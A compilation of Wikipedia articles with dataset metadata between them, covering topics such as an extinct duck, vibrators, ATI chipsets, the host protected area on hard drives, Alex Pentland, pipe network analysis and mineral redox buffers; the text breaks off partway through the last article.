Coues's gadwall (Mareca strepera couesi) or the Washington Island gadwall, is an extinct dabbling duck which is only known by two immature specimens from the Pacific island of Teraina, Line Islands, Kiribati. They are in the National Museum of Natural History in Washington, D.C. The bird was named in honor of Elliott Coues. Description A male and a female are known, which resemble the immature appearance of the common gadwall except for the black bill with a higher number of filtering lamellae, black feet, and the much inferior size (which may be due to the birds not being fully grown). The male resembles a male common gadwall in eclipse plumage, save for some white speckling on the breast and back. The female looks like a small common gadwall female; the primary wing coverts were not patterned black, and the inner web of the secondary remiges was grey instead of white. Measurements are: wing, 19.9 cm; bill, 3.7 cm; tarsus 3.6 cm. This means the birds were the size of a Cape teal or a garganey, with a total length of 40–45 cm. As the birds were not fully adult when shot, it is not clear whether they would not have grown a bit larger. Status and extinction The status of this bird is controversial. While many scientists consider it a dwarf subspecies of the common gadwall (Anas strepera strepera) others argue that the two individuals might have been just juveniles of a local breeding population that might not even have been taxonomically distinct. The common gadwall is a known vagrant to the Tuamotu Islands (Kolbe wrote "Tahiti which is a misreading of Greenway) and Hawaii for example, which are about the same distance from the species' breeding grounds, as is Teraina (which, moreover, lies in between these two groups). This makes it entirely possible that the two Coues's gadwalls that were shot were just the offspring of a few vagrant common gadwalls, maybe settling there after being wounded by hunters. On the other hand, Streets' reports suggest that there was a population of these ducks of some size present, and thus they may have lived there for quite some time and indeed be worthy of recognition as a distinct taxon. The observations of the two individuals took place in January 1874. The subspecies' description was by Thomas Hale Streets (1847–1925) in 1876. Streets reported about the two immatures he shot, which were found in a peat bog. The cause of its extinction might be the extensive hunting by settlers of Tabuaeran (Fanning Island), which had shot large numbers of migrant ducks on both Teraina and Tabuaeran each year. W. G. Anderson, a local resident stated in 1926 that growing up on Teraina and Tabueran around the turn of the century, he had never encountered a native population of gadwalls on Teraina. Thus, the subspecies' disappearance can be fixed to the last quarter of the 19th century, between the mid-1870s and 1900. Notes References Further reading Fuller, Errol (2000): Extinct Birds (2nd ed.). Oxford University Press, Oxford, New York. Coues's gadwall Ducks Controversial bird taxa Bird extinctions since 1500 Coues's gadwall Coues's gadwall Extinct birds of Oceania
Coues's gadwall
[ "Biology" ]
722
[ "Biological hypotheses", "Controversial bird taxa", "Controversial taxa" ]
7,449,035
https://en.wikipedia.org/wiki/Vibrator%20%28mechanical%29
A vibrator is a mechanical device to generate vibrations. The vibration is often generated by an electric motor with an unbalanced mass on its driveshaft. There are many different types of vibrator. Typically, they are components of larger products such as smartphones, pagers, or video game controllers with a "rumble" feature. Vibrators as components When smartphones and pagers vibrate, the vibrating alert is produced by a small component that is built into the phone or pager. Many older, non-electronic buzzers and doorbells contain a component that vibrates for the purpose of producing a sound. Tattoo machines and some types of electric engraving tools contain a mechanism that vibrates a needle or cutting tool. Aircraft stick shakers use a vibrating mechanism attached to the pilots' control yokes to provide a tactile warning of an impending aerodynamic stall. Eccentric rotating mass (ERM) vibrators work by rotating a deliberately unbalanced weight, so the weight is eccentric. Linear resonant actuators (LRAs) work by repeatedly moving a weight from one side of the actuator to another, using a coil acting as an electromagnet. Coin vibration motors have the shape of a coin and are often of the ERM type. Industrial vibrators Vibrators are used in many different industrial applications both as components and as individual pieces of equipment. Bowl feeders, vibratory feeders and vibrating hoppers are used extensively in the food, pharmaceutical, and chemical industries to move and position bulk material or small component parts. The application of vibration working with the force of gravity can often move materials through a process more effectively than other methods. Vibration is often used to position small components so that they can be gripped mechanically by automated equipment as required for assembly etc. Vibrating screens are used to separate bulk materials in a mixture of different sized particles. For example, sand, gravel, river rock and crushed rock, and other aggregates are often separated by size using vibrating screens. Vibrating compactors are used for soil compaction especially in foundations for roads, railways, and buildings. Concrete vibrators consolidate freshly poured concrete so that trapped air and excess water are released and the concrete settles firmly in place in the formwork. Improper consolidation of concrete can cause product defects, compromise the concrete strength, and produce surface blemishes such as bug holes and honeycombing. An internal concrete vibrator is a steel cylinder about the size of the handle of a baseball bat, with a hose or electrical cord attached to one end. The vibrator head is immersed in the wet concrete. External concrete vibrators attach, via a bracket or clamp system, to the concrete forms. There are a wide variety of external concrete vibrators available and some vibrator manufacturers have bracket or clamp systems designed to fit the major brands of concrete forms. External concrete vibrators are available in hydraulic, pneumatic or electric power. Vibrating tables or shake tables are sometimes used to test products to determine or demonstrate their ability to withstand vibration. Testing of this type is commonly done in the automotive, aerospace, and defense industries. These machines are capable of producing three different types of vibration profile sine sweep, random vibration, and synthesized shock. In all three of these applications, the part under test will typically be instrumented with one or more accelerometers to measure component response to the vibration input. A sine sweep vibration profile typically starts vibrating at low frequency and increases in frequency at a set rate (measured in hertz). The vibratory amplitude as measured in gs may increase or decrease as well. A sine sweep will find resonant frequencies in the part. A random vibration profile will excite different frequencies along a spectrum at different times. Significant calculation goes into making sure that all frequencies get excited to within an acceptable tolerance band. A random vibration test suite may range anywhere from 30 seconds up to several hours. It is intended to synthesize the effect of, for example, a car driving over rough terrain or a rocket taking off. A synthesized shock pulse is a short duration high level vibration calculated as a sum of many half-sine waves covering a range of frequencies. It is intended to simulate the effects of an impact or explosion. A shock pulse test typically lasts less than a second. Vibrating tables can also be used in the packaging process in material handling industries to shake or settle a container so it can hold more product. References Electric motors Mechanical vibrations
Vibrator (mechanical)
[ "Physics", "Technology", "Engineering" ]
918
[ "Structural engineering", "Engines", "Electric motors", "Mechanics", "Mechanical vibrations", "Electrical engineering" ]
7,449,188
https://en.wikipedia.org/wiki/Vibrator%20%28electronic%29
A vibrator is an electromechanical device that takes a DC electrical supply and converts it into pulses that can be fed into a transformer. It is similar in purpose (although greatly different in operation) to the solid-state power inverter. Before the development of switch-mode power supplies and the introduction of semiconductor devices operating off low voltage, there was a requirement to generate voltages of about 50 to 250 V DC from a vehicle's battery. A vibrator was used to provide pulsating DC which could be converted to a higher voltage with a transformer, rectified, and filtered to create higher-voltage DC. It is essentially a relay using normally closed contacts to supply power to the relay coil, thus immediately breaking the connection, only to be reconnected very quickly through the normally closed contacts. It happens so rapidly it vibrates, and sounds like a buzzer. This same rapidly pulsing contact applies the rising and falling DC voltage to the transformer which can step it up to a higher voltage. The primary use for this type of circuit was to operate vacuum tube radios in vehicles, but it also saw use with other mobile electronic devices with a 6 or 12 V accumulator, especially in places with no mains electricity supply such as farms. These vibrator power supplies became popular in the 1940s, replacing more bulky motor-generator systems for the generation of AC voltages for such applications. Vacuum tubes require plate voltages ranging from about 45 volts to 250 volts in electronic devices such as radios. For portable radios, hearing aids and similar equipment, B batteries were manufactured with various voltage ratings. In order to provide the necessary voltage for a radio from the typical 6 or 12 volt DC supply available in a car or from a farm lighting battery, it was necessary to convert the steady DC supply to a pulsating DC and use a transformer to increase the voltage. Vibrators often experienced mechanical malfunctions, being constantly in motion, such as the springs losing tension, and the contact points wearing down. As tubes began to be replaced by transistor based electrical systems, the need to generate such high voltages began to diminish. Mechanical vibrators fell out of production near the end of the 20th century, but solid-state electronic vibrators are still manufactured to be backwards compatible with older units. Use The vibrator was a device with switch contacts mounted at the ends of flexible metal strips. In operation, these strips are vibrated by an electromagnet, causing the contacts to open and close rapidly. The contacts interrupt the 6 or 12V direct current from the battery to form a stream of pulses which change back and forth from 0 volts to the battery voltage, effectively generating a square wave. Unlike a steady direct current, when such a pulsating current is applied to the primary winding of a transformer it will induce an alternating current in the secondary winding, at a pre-determined voltage based on the turn ratio of the windings. This current can then be rectified by a thermionic diode, a copper-oxide/selenium rectifier, or by an additional set of mechanical contacts (in which case the vibrator acts as a type of synchronous rectifier). The rectified output is then filtered, ultimately producing a DC voltage typically much higher than the battery voltage, with some losses dissipated as heat. This arrangement is essentially an electromechanical inverter circuit. The vibrator's primary contacts alternately make and break current supply to the transformer primary. As it is impossible for the vibrator's contacts to change over instantaneously, the collapsing magnetic field in the core will induce a high voltage in the windings and will cause sparking at the vibrator's contacts. This would erode the contacts very quickly, so a snubber capacitor with a high voltage rating (C8 in the diagram) is added across the transformer secondary to damp out the unwanted high-voltage "spikes". Since vibrators wore out over time, they were usually encased in a steel or aluminum "tin can" enclosure with a multi-pin plug at the bottom (similar to the contact pins on vacuum tubes), so they could be quickly unplugged and replaced without using tools. Vibrators generate a certain amount of audible noise (a constant buzzing sound) while in operation, which could potentially be heard by passengers in the car while the radio was on. To help contain this sound within the vibrator's enclosure, the inside surface of the can was often lined with a thick soundproofing material, such as foam rubber. Since vibrators were typically plugged into sockets mounted directly on the radio chassis, the vibration could potentially be mechanically coupled to the chassis, causing it to act as a sounding-board for the noise. To prevent this, the sound-deadening lining inside the can was sometimes made thick enough to support the vibrator's components by friction alone. The components were then connected to the plug pins by flexible wires, to further isolate the vibration from the plug. See also Boost converter Chopper Mechanical rectifier Multivibrator Reed relay Switched-mode power supply References Electric power conversion Electrical components
Vibrator (electronic)
[ "Technology", "Engineering" ]
1,089
[ "Electrical engineering", "Electrical components", "Components" ]
7,449,438
https://en.wikipedia.org/wiki/Micro-loop%20heat%20pipe
A micro-loop heat pipe or MLHP is a miniature loop heat pipe in which the radius of curvature of the liquid meniscus in the evaporator is in the same order of magnitude of the micro grooves' dimensions; or a miniature loop heat pipe which has been fabricated using microfabrication techniques. References Cooling technology Microtechnology
Micro-loop heat pipe
[ "Materials_science", "Engineering" ]
71
[ "Materials science", "Microtechnology" ]
7,450,068
https://en.wikipedia.org/wiki/List%20of%20ATI%20chipsets
This is a comparison of chipsets, manufactured by ATI Technologies. For AMD processors Comparison of Northbridges Comparison of Southbridges For Intel processors Comparison of Northbridges Comparison of Southbridges See also List of Intel chipsets Comparison of AMD chipsets Comparison of Nvidia chipsets List of VIA chipsets Comparison of AMD graphics processing units Comparison of Nvidia graphics processing units External links Intel chipset solutions AMD chipset solutions ATI Chipsets ATI Chipsets
List of ATI chipsets
[ "Technology" ]
102
[ "Computing comparisons" ]
7,450,714
https://en.wikipedia.org/wiki/Host%20protected%20area
The host protected area (HPA) is an area of a hard drive or solid-state drive that is not normally visible to an operating system. It was first introduced in the ATA-4 standard CXV (T13) in 2001. How it works The IDE controller has registers that contain data that can be queried using ATA commands. The data returned gives information about the drive attached to the controller. There are three ATA commands involved in creating and using a host protected area. The commands are: IDENTIFY DEVICE SET MAX ADDRESS READ NATIVE MAX ADDRESS Operating systems use the IDENTIFY DEVICE command to find out the addressable space of a hard drive. The IDENTIFY DEVICE command queries a particular register on the IDE controller to establish the size of a drive. This register however can be changed using the SET MAX ADDRESS ATA command. If the value in the register is set to less than the actual hard drive size then effectively a host protected area is created. It is protected because the OS will work with only the value in the register that is returned by the IDENTIFY DEVICE command and thus will normally be unable to address the parts of the drive that lie within the HPA. The HPA is useful only if other software or firmware (e.g. BIOS or UEFI) is able to use it. Software and firmware that are able to use the HPA are referred to as 'HPA aware'. The ATA command that these entities use is called READ NATIVE MAX ADDRESS. This command accesses a register that contains the true size of the hard drive. To use the area, the controlling HPA-aware program changes the value of the register read by IDENTIFY DEVICE to that found in the register read by READ NATIVE MAX ADDRESS. When its operations are complete, the register read by IDENTIFY DEVICE is returned to its original fake value. Use At the time HPA was first implemented on hard-disk firmware, some BIOS had difficulty booting with large hard disks. An initial HPA could then be set (by some jumpers on the hard disk) to limit the number of cylinders to 4095 or 4096 so that the older BIOS would start. It was then the job of the bootloader to reset the HPA so that the operating system would see the full hard-disk storage space. HPA can be used by various booting and diagnostic utilities, normally in conjunction with the BIOS. An example of this implementation is the Phoenix FirstBIOS, which uses Boot Engineering Extension Record (BEER) and Protected Area Run Time Interface Extension Services (PARTIES). Another example is the Gujin installer which can install the bootloader in BEER, naming that pseudo-partition /dev/hda0 or /dev/sdb0; then only cold boots (from power-down) will succeed because warm boots (from Control-Alt-Delete) will not be able to read the HPA. Computer manufacturers may use the area to contain a preloaded OS for install and recovery purposes (instead of providing DVD or CD media). Dell notebooks hide Dell MediaDirect utility in HPA. IBM ThinkPad and LG notebooks hide system restore software in HPA. HPA is also used by various theft recovery and monitoring service vendors. For example, the laptop security firm CompuTrace use the HPA to load software that reports to their servers whenever the machine is booted on a network. HPA is useful to them because even when a stolen laptop has its hard drive formatted the HPA remains untouched. HPA can also be used to store data that is deemed illegal and is thus of interest to government and police computer forensics teams. Some vendor-specific external drive enclosures (e.g. Maxtor, owned by Seagate since 2006) are known to use HPA to limit the capacity of unknown replacement hard drives installed into the enclosure. When this occurs, the drive may appear to be limited in size (e.g. 128 GB), which can look like a BIOS or dynamic drive overlay (DDO) problem. In this case, one must use software utilities (see below) that use READ NATIVE MAX ADDRESS and SET MAX ADDRESS to change the drive's reported size back to its native size, and avoid using the external enclosure again with the affected drive. Some rootkits hide in the HPA to avoid being detected by anti-rootkit and antivirus software. Some NSA exploits use the HPA for application persistence. Identification and manipulation Identification of HPA on a hard drive can be achieved by a number of tools and methods: ATATool by Data Synergy EnCase by Guidance Software Forensic Toolkit by Access Data hdparm by Mark Lord The Sleuth Kit (free, open software) by Brian Carrier (HPA identification is currently only supported on Linux.) Note that the HPA feature can be hidden by DCO commands (documentation states only if the HPA is not in use), and can be "frozen" (until next power-down of the hard disk) or be password protected. See also Device Configuration Overlay (DCO) GUID Partition Table (GPT) Master boot record (MBR) References External links The Sleuth Kit International Journal of Digital Evidence Dublin City University Security & Forensics wiki Wiki Web For ThinkPad Users AT Attachment Computer forensics Computer security procedures Information technology audit
Host protected area
[ "Engineering" ]
1,104
[ "Cybersecurity engineering", "Computer security procedures", "Computer forensics" ]
7,451,513
https://en.wikipedia.org/wiki/Alex%20Pentland
Alex Paul "Sandy" Pentland (born 1951) is an American computer scientist, HAI Fellow at Stanford, Toshiba Professor at MIT, and serial entrepreneur. Education Pentland received his bachelor's degree from the University of Michigan and obtained his Ph.D. from Massachusetts Institute of Technology in 1982. Career Pentland started as a lecturer at Stanford University in both computer science and psychology, and joined the MIT faculty in 1986, where he became Academic Head of the Media Laboratory and received the Toshiba Chair in Media Arts and Sciences, later joined the faculty of the MIT School of Engineering and the MIT Sloan School, and recently became HAI Fellow at Stanford. He serves on the Board of the UN Global Partnership for Sustainable Development Data, advisory boards of Consumers Union, OECD and the Abu Dhabi Investment Authority Lab, and formerly of the American Bar Association, AT&T, and several of the startup companies he has co-founded. He previously co-founded and co-directed the Media Lab Asia laboratories at the Indian Institutes of Technology and Strong Hospital's Center for Future Health. Pentland is one of the most cited authors in computer science with an h-index of 155, is a member of the U.S. National Academy of Engineering, co-led the World Economic Forum discussion in Davos that led to the EU privacy regulation GDPR, and was one of the UN Secretary General's "Data Revolutionaries" that helped forge the transparency and accountability mechanisms in the UN's Sustainable Development Goals. Pentland founded MIT Connection Science an MIT-wide program which pioneered computational social science, using big data and AI to better understand human society, and the Trust::Data Alliance which is an alliance of companies and nations building open-source software that makes AI and data safe, trusted and secure. He also founded the MIT Media Lab Entrepreneurship Program which creates ventures to take cutting-edge technologies into the real world, was Academic Director of the Data-Pop Alliance, and co-founder of Imagination In Action which bring world-changing inventors together with leaders of governments and companies. In 2011 Tim O’Reilly named him one of the world's seven most powerful data scientists along with Larry Page, then CEO of Google and the CTO of the Department of Health and Human Services. Recent invited keynotes include annual meetings of U.S. National Academy of Engineering, OECD, G20, World Bank, and JP Morgan. Pentland's research focuses on next-gen Web infrastructure, AI, Computational Social Science, and Privacy. His research helps people better understand the "physics" of their social environment, and helps individuals, companies and communities to reinvent themselves to be safer, more productive, and more creative. He has previously been a pioneer in wearable computing, ventures technology for developing nations, and image understanding. His research has been featured in Nature, Science, and Harvard Business Review, as well as being the focus of TV features on BBC World, Discover and Science channels. Companies co-founded or incubated by Pentland's lab include the largest rural health care service delivery system in the world, the advertising arm of Alibaba, the identity authentication technology that powers India's digital identity system Aadhaar, and rural service outlets for India's largest payment solutions provider. More recent companies include Ginger.io (mental health services), CogitoCorp.com (AI coaching for interaction management), SCRT.network (Web3 confidential smart contracts), Wise Systems (delivery planning and optimization), Sila Money (stable bank and stablecoin), Akoya (secure, privacy-preserving financial interactions), FortifID (digital identity), Metha.ai (microbiome interventions for GHG reduction and health), and Array Insights (federated medical data analytics). Pentland, along with colleagues William J. Mitchell and Kent Larson at the Massachusetts Institute of Technology are credited with first exploring the concept of a living laboratory. They argued that a living lab represents a user-centric research methodology for sensing, prototyping, validating and refining complex solutions in multiple and evolving real life contexts. Nowadays, several living lab descriptions and definitions are available from different sources. Publications Honest Signals (2010) describes research chosen as Harvard Business Review Breakthrough Idea of the Year. Social Physics (2015) describes research that won both the McKinsey Award from Harvard Business Review and the 40th Anniversary of the Internet Grand Challenge. References External links MIT Home Page and link to MIT Human Dynamics research group Reporting on Pentland's research (video) 1952 births Living people University of Michigan alumni Massachusetts Institute of Technology alumni American computer scientists Stanford University School of Engineering faculty MIT School of Engineering faculty Ubiquitous computing researchers Stanford University Department of Psychology faculty MIT Media Lab people New England Complex Systems Institute MIT Sloan School of Management faculty Government by algorithm
Alex Pentland
[ "Engineering" ]
985
[ "Government by algorithm", "Automation" ]
7,451,605
https://en.wikipedia.org/wiki/Critically%20endangered
An IUCN Red List critically endangered (CR or sometimes CE) species is one that has been categorized by the International Union for Conservation of Nature as facing an extremely high risk of extinction in the wild. As of December 2023, of the 157,190 species currently on the IUCN Red List, 9,760 of those are listed as critically endangered, with 1,302 being possibly extinct and 67 possibly extinct in the wild. The IUCN Red List provides the public with information regarding the conservation status of animal, fungi, and plant species. It divides various species into seven different categories of conservation that are based on habitat range, population size, habitat, threats, etc. Each category represents a different level of global extinction risk. Species that are considered to be critically endangered are placed within the "Threatened" category. As the IUCN Red List does not consider a species extinct until extensive targeted surveys have been conducted, species that are possibly extinct are still listed as critically endangered. IUCN maintains a list of "possibly extinct" and "possibly extinct in the wild" species, modelled on categories used by BirdLife International to categorize these taxa. Criteria To be defined as critically endangered in the Red List, a species must meet any of the following criteria (A–E) ("3G/10Y" signifies three generations or ten years—whichever is longer—over a maximum of 100 years; "MI" signifies Mature Individuals): A: Population Size Reduction The rate of reduction is measured either over a 10 year span or across three different generations within that species. The cause for this decline must also be known. If the reasons for population reduction no longer occur and can be reversed, the population needs to have been reduced by at least 90% If not, then the population needs to have been reduced by at least 80% B: Reduction Across a Geographic Range This reduction must occur over less than 100 km2 OR the area of occupancy is less than 10 km2. Severe habitat fragmentation or existing at just one location Decline in extent of occurrence, area of occupancy, area/extent/quality of habitat, number of locations/subpopulations, or amount of MI. Extreme fluctuations in extent of occurrence, area of occupancy, number of locations/subpopulations, or amount of MI. C: Population Decline The population must decline to less than 250 MI and either: A decline of 25% over 3G/10Y Extreme fluctuations, or over 90% of MI in a single subpopulation, or no more than 50 MI in any one subpopulation. D: Population Size Reduction The population size must be reduced to numbers of less than 50 MI. E: Probability of Extinction There must be at least a 50% probability of going extinct in the wild within over 3G/10Y Causes The current extinction crisis is witnessing extinction rates that are occurring at a faster rate than that of the natural extinction rate. It has largely been credited towards human impacts on climate change and the loss of biodiversity. This is along with natural forces that may create stress on the species or cause an animal population to become extinct. Currently the biggest reason for species extinction is human interaction resulting in habitat loss. Species rely on their habitat for the resources needed for their survival. If the habitat becomes destroyed, the population will see a decline in their numbers. Activities that cause loss of habitat include pollution, urbanization, and agriculture. Another reason for plants and animals to become endangered is due to the introduction of invasive species. Invasive species invade and exploit a new habitat for its natural resources as a method to outcompete the native organisms, eventually taking over the habitat. This can lead to either the native species' extinction or causing them to become endangered, which also eventually causes extinction. Plants and animals may also go extinct due to disease. The introduction of a disease into a new habitat can cause it to spread amongst the native species. Due to their lack of familiarity with the disease or little resistance, the native species can die off. References IUCN Red List Biota by conservation status
Critically endangered
[ "Biology" ]
823
[ "Biota by conservation status", "Biodiversity" ]
7,451,826
https://en.wikipedia.org/wiki/Transverse%20folds%20of%20rectum
The transverse folds of rectum (or Houston's valves or the valves of Houston) are semi-lunar transverse folds of the rectal wall that protrude into the rectum, not the anal canal as that lies below the rectum. Their use seems to be to support the weight of fecal matter, and prevent its urging toward the anus, which would produce a strong urge to defecate. Although the term rectum means straight, these transverse folds overlap each other during the empty state of the intestine to such an extent that, as Houston remarked, they require considerable maneuvering to conduct an instrument along the canal, as often occurs in sigmoidoscopy and colonoscopy. These folds are about 12 mm. in width and are composed of the circular muscle coat of the rectum. They are usually three in number; sometimes a fourth is found, and occasionally only two are present. One is situated near the commencement of the rectum, on the right side. A second extends inward from the left side of the tube, opposite the middle of the sacrum. A third, the largest and most constant, projects backward from the forepart of the rectum, opposite the fundus of the urinary bladder. When a fourth is present, it is situated nearly 2.5 cm above the anus on the left and posterior wall of the tube. Transverse folds were first described by Irish anatomist John Houston, curator of the Royal College of Surgeons in Ireland Museum, in 1830. They appear to be peculiar to human physiology: Baur (1863) looked for Houston's valves in a number of mammals, including wolf, bear, rhinoceros, and several Old World primates, but found no evidence. They are formed very early during human development, and may be visible in embryos of as little as 55 mm in length (10 weeks of gestational age.) External links () References Digestive system Rectum
Transverse folds of rectum
[ "Biology" ]
404
[ "Digestive system", "Organ systems" ]
7,451,902
https://en.wikipedia.org/wiki/Pipe%20network%20analysis
In fluid dynamics, pipe network analysis is the analysis of the fluid flow through a hydraulics network, containing several or many interconnected branches. The aim is to determine the flow rates and pressure drops in the individual sections of the network. This is a common problem in hydraulic design. Description To direct water to many users, municipal water supplies often route it through a water supply network. A major part of this network will consist of interconnected pipes. This network creates a special class of problems in hydraulic design, with solution methods typically referred to as pipe network analysis. Water utilities generally make use of specialized software to automatically solve these problems. However, many such problems can also be addressed with simpler methods, like a spreadsheet equipped with a solver, or a modern graphing calculator. Deterministic network analysis Once the friction factors of the pipes are obtained (or calculated from pipe friction laws such as the Darcy-Weisbach equation), we can consider how to calculate the flow rates and head losses on the network. Generally the head losses (potential differences) at each node are neglected, and a solution is sought for the steady-state flows on the network, taking into account the pipe specifications (lengths and diameters), pipe friction properties and known flow rates or head losses. The steady-state flows on the network must satisfy two conditions: At any junction, the total flow into a junction equals the total flow out of that junction (law of conservation of mass, or continuity law, or Kirchhoff's first law) Between any two junctions, the head loss is independent of the path taken (law of conservation of energy, or Kirchhoff's second law). This is equivalent mathematically to the statement that on any closed loop in the network, the head loss around the loop must vanish. If there are sufficient known flow rates, so that the system of equations given by (1) and (2) above is closed (number of unknowns = number of equations), then a deterministic solution can be obtained. The classical approach for solving these networks is to use the Hardy Cross method. In this formulation, first you go through and create guess values for the flows in the network. The flows are expressed via the volumetric flow rates Q. The initial guesses for the Q values must satisfy the Kirchhoff laws (1). That is, if Q7 enters a junction and Q6 and Q4 leave the same junction, then the initial guess must satisfy Q7 = Q6 + Q4. After the initial guess is made, then, a loop is considered so that we can evaluate our second condition. Given a starting node, we work our way around the loop in a clockwise fashion, as illustrated by Loop 1. We add up the head losses according to the Darcy–Weisbach equation for each pipe if Q is in the same direction as our loop like Q1, and subtract the head loss if the flow is in the reverse direction, like Q4. In other words, we add the head losses around the loop in the direction of the loop; depending on whether the flow is with or against the loop, some pipes will have head losses and some will have head gains (negative losses). To satisfy the Kirchhoff's second laws (2), we should end up with 0 about each loop at the steady-state solution. If the actual sum of our head loss is not equal to 0, then we will adjust all the flows in the loop by an amount given by the following formula, where a positive adjustment is in the clockwise direction. where n is 1.85 for Hazen-Williams and n is 2 for Darcy–Weisbach. The clockwise specifier (c) means only the flows that are moving clockwise in our loop, while the counter-clockwise specifier (cc) is only the flows that are moving counter-clockwise. This adjustment doesn't solve the problem, since most networks have several loops. It is okay to use this adjustment, however, because the flow changes won't alter condition 1, and therefore, the other loops still satisfy condition 1. However, we should use the results from the first loop before we progress to other loops. An adaptation of this method is needed to account for water reservoirs attached to the network, which are joined in pairs by the use of 'pseudo-loops' in the Hardy Cross scheme. This is discussed further on the Hardy Cross method site. The modern method is simply to create a set of conditions from the above Kirchhoff laws (junctions and head-loss criteria). Then, use a Root-finding algorithm to find Q values that satisfy all the equations. The literal friction loss equations use a term called Q2, but we want to preserve any changes in direction. Create a separate equation for each loop where the head losses are added up, but instead of squaring Q, use |Q|·Q instead (with |Q| the absolute value of Q) for the formulation so that any sign changes reflect appropriately in the resulting head-loss calculation. Probabilistic network analysis In many situations, especially for real water distribution networks in cities (which can extend between thousands to millions of nodes), the number of known variables (flow rates and/or head losses) required to obtain a deterministic solution will be very large. Many of these variables will not be known, or will involve considerable uncertainty in their specification. Furthermore, in many pipe networks, there may be considerable variability in the flows, which can be described by fluctuations about mean flow rates in each pipe. The above deterministic methods are unable to account for these uncertainties, whether due to lack of knowledge or flow variability. For these reasons, a probabilistic method for pipe network analysis has recently been developed, based on the maximum entropy method of Jaynes. In this method, a continuous relative entropy function is defined over the unknown parameters. This entropy is then maximized subject to the constraints on the system, including Kirchhoff's laws, pipe friction properties and any specified mean flow rates or head losses, to give a probabilistic statement (probability density function) which describes the system. This can be used to calculate mean values (expectations) of the flow rates, head losses or any other variables of interest in the pipe network. This analysis has been extended using a reduced-parameter entropic formulation, which ensures consistency of the analysis regardless of the graphical representation of the network. A comparison of Bayesian and maximum entropy probabilistic formulations for the analysis of pipe flow networks has also been presented, showing that under certain assumptions (Gaussian priors), the two approaches lead to equivalent predictions of mean flow rates. Other methods of stochastic optimization of water distribution systems rely on metaheuristic algorithms, such as simulated annealing and genetic algorithms. See also References Further reading N. Hwang, R. Houghtalen, "Fundamentals of Hydraulic Engineering Systems" Prentice Hall, Upper Saddle River, NJ. 1996. L.F. Moody, "Friction factors for pipe flow," Trans. ASME, vol. 66, 1944. C. F. Colebrook, "Turbulent flow in pipes, with particular reference to the transition region between smooth and rough pipe laws," Jour. Ist. Civil Engrs., London (Feb. 1939). Eusuff, Muzaffar M.; Lansey, Kevin E. (2003). "Optimization of Water Distribution Network Design Using the Shuffled Frog Leaping Algorithm". Journal of Water Resources Planning and Management. 129 (3): 210-225. Fluid dynamics Hydraulics Hydraulic engineering Networks Piping
Pipe network analysis
[ "Physics", "Chemistry", "Engineering", "Environmental_science" ]
1,571
[ "Hydrology", "Building engineering", "Chemical engineering", "Physical systems", "Hydraulics", "Civil engineering", "Mechanical engineering", "Piping", "Hydraulic engineering", "Fluid dynamics" ]
7,451,913
https://en.wikipedia.org/wiki/Mineral%20redox%20buffer
In geology, a redox buffer is an assemblage of minerals or compounds that constrains oxygen fugacity as a function of temperature. Knowledge of the redox conditions (or equivalently, oxygen fugacities) at which a rock forms and evolves can be important for interpreting the rock history. Iron, sulfur, and manganese are three of the relatively abundant elements in the Earth's crust that occur in more than one oxidation state. For instance, iron, the fourth most abundant element in the crust, exists as native iron, ferrous iron (Fe2+), and ferric iron (Fe3+). The redox state of a rock affects the relative proportions of the oxidation states of these elements and hence may determine both the minerals present and their compositions. If a rock contains pure minerals that constitute a redox buffer, then the oxygen fugacity of equilibration is defined by one of the curves in the accompanying fugacity-temperature diagram. Common redox buffers and mineralogy Redox buffers were developed in part to control oxygen fugacities in laboratory experiments to investigate mineral stabilities and rock histories. Each of the curves plotted in the fugacity-temperature diagram is for an oxidation reaction occurring in a buffer. These redox buffers are listed here in order of decreasing oxygen fugacity at a given temperature—in other words, from more oxidizing to more reducing conditions in the plotted temperature range. As long as all the pure minerals (or compounds) are present in a buffer assemblage, the oxidizing conditions are fixed on the curve for that buffer. Pressure has only a minor influence on these buffer curves for conditions in the Earth's crust. MH: magnetite-hematite: 4 Fe3O4 + O2 ⇌ 6 Fe2O3 NiNiO: nickel-nickel oxide: 2 Ni + O2 ⇌ 2 NiO FMQ: fayalite-magnetite-quartz: 3 Fe2SiO4 + O2 ⇌ 2 Fe3O4 + 3 SiO2 WM: wüstite-magnetite: 3 Fe1−xO + O2 ~ Fe3O4 IW: iron-wüstite: 2 (1-x) Fe + O2 ⇌ 2 Fe1−xO QIF: quartz-iron-fayalite: 2 Fe + SiO2 + O2 ⇌ Fe2SiO4 Minerals, rock types, and characteristic buffers Mineralogy and correlations with redox buffer The ratio of Fe2+ to Fe3+ within a rock determines, in part, the silicate mineral and oxide mineral assemblage of the rock. Within a rock of a given chemical composition, iron enters minerals based on the bulk chemical composition and the mineral phases which are stable at that temperature and pressure. For instance, at redox conditions more oxidizing than the MH (magnetite-hematite) buffer, at least much of the iron is likely to be present as Fe3+ and hematite is a likely mineral in iron-bearing rocks. Iron may only enter minerals such as olivine if it is present as Fe2+; Fe3+ cannot enter the lattice of fayalite olivine. Elements in olivine such as magnesium, however, stabilize olivine containing Fe2+ to conditions more oxidizing than those required for fayalite stability. Solid solution between magnetite and the titanium-bearing endmember, ulvospinel, enlarges the stability field of magnetite. Likewise, at conditions more reducing than the IW (iron-wustite) buffer, minerals such as pyroxene can still contain Fe3+. The redox buffers therefore are only approximate guides to the proportions of Fe2+ and Fe3+ in minerals and rocks. Igneous rocks Terrestrial igneous rocks commonly record crystallization at oxygen fugacities more oxidizing than the WM (wüstite-magnetite) buffer and more reduced than a log unit or so above the nickel-nickel oxide (NiNiO) buffer. Their oxidizing conditions thus are not far from those of the FMQ (fayalite-magnetite-quartz) redox buffer. Nonetheless, there are systematic differences that correlate with tectonic setting. Igneous rock emplaced and erupted in island arcs typically record oxygen fugacities 1 or more log units more oxidizing than those of the NiNiO buffer. In contrast, basalt and gabbro in non-arc settings typically record oxygen fugacities from about those of the FMQ buffer to a log unit or so more reducing than that buffer. Sedimentary rocks Oxidizing conditions are common in some environments of deposition and diagenesis of sedimentary rocks. The fugacity of oxygen at the MH buffer (magnetite-hematite) is only about 10−70 at 25 °C, but it is about 0.2 atmospheres in the Earth's atmosphere, so some sedimentary environments are far more oxidizing than those in magmas. Other sedimentary environments, such as the environments for formation of black shale, are relatively reducing. Metamorphic rocks Oxygen fugacities during metamorphism extend to higher values than those in magmatic environments, because of the more oxidizing compositions inherited from some sedimentary rocks. Nearly pure hematite is present in some metamorphosed banded iron formations. In contrast, native nickel-iron is present in some serpentinites. Extraterrestrial rocks Within meteorites, the iron-wüstite redox buffer may be more appropriate for describing the oxygen fugacity of these extraterrestrial systems. Redox effects and sulfur Sulfide minerals such as pyrite (FeS2) and pyrrhotite 